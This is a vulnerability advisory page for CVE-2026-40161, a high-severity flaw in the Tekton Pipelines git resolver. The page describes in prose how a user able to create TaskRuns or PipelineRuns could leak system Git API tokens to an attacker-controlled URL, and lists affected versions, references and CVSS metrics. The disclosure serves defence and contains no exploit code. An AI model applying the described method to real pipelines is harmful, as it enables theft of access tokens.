API Token Exposure in Tekton Pipelines by Tekton
CVE-2026-40161

7.7HIGH

Key Information:

Vendor

Tektoncd

Status
Pipeline
Vendor
CVE Published:
21 April 2026

What is CVE-2026-40161?

The Tekton Pipelines project, which facilitates CI/CD workflows using Kubernetes resources, contains a vulnerability in its git resolver. In the affected versions (1.0.0 to 1.10.0), if a user fails to provide a token parameter, the system-configured Git API token may unintentionally be sent to an attacker-controlled server URL. A malicious actor with create permissions for TaskRun or PipelineRun can exploit this weakness to exfiltrate sensitive tokens like GitHub or GitLab Personal Access Tokens (PATs) by directing traffic to malicious endpoints. This exposure presents a serious risk to the integrity of CI/CD workflows and requires immediate action to secure configurations.

Affected Version(s)

pipeline >= 1.0.0, <= 1.10.0

References

https://github.com/tektoncd/pipeline/security/advisories/...
x_refsource_CONFIRM
https://github.com/tektoncd/pipeline/issues/9608
x_refsource_MISC
https://github.com/tektoncd/pipeline/issues/9609
x_refsource_MISC

CVSS V3.1

Score:
7.7
Severity:
HIGH
Confidentiality:
High
Integrity:
None
Availability:
High
Attack Vector:
Network
Attack Complexity:
Low
Privileges Required:
Low
User Interaction:
None
Scope:
Changed

Timeline

  • Vulnerability published

  • Vulnerability Reserved

.